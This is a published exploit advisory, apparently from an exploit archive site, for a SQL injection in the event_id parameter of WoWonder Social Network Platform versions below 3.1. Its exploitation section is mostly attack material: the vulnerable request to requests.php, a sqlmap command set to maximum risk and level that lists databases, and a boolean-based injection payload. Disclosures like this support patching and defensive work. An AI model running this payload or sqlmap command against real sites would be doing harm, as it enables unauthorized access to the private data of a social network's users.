WoWonder Social Network Platform 3.1 event_id SQL Injection

2021.03.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection # Date: 16.03.2021 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://www.wowonder.com/ # Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302 # Version: < 3.1 # Tested on: Linux/Windows DESCRIPTION In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter. The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php. Example: /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID if an attacker exploits this vulnerability, attacker may access private data in the database system. EXPLOITATION # GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1 # Host: Target Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top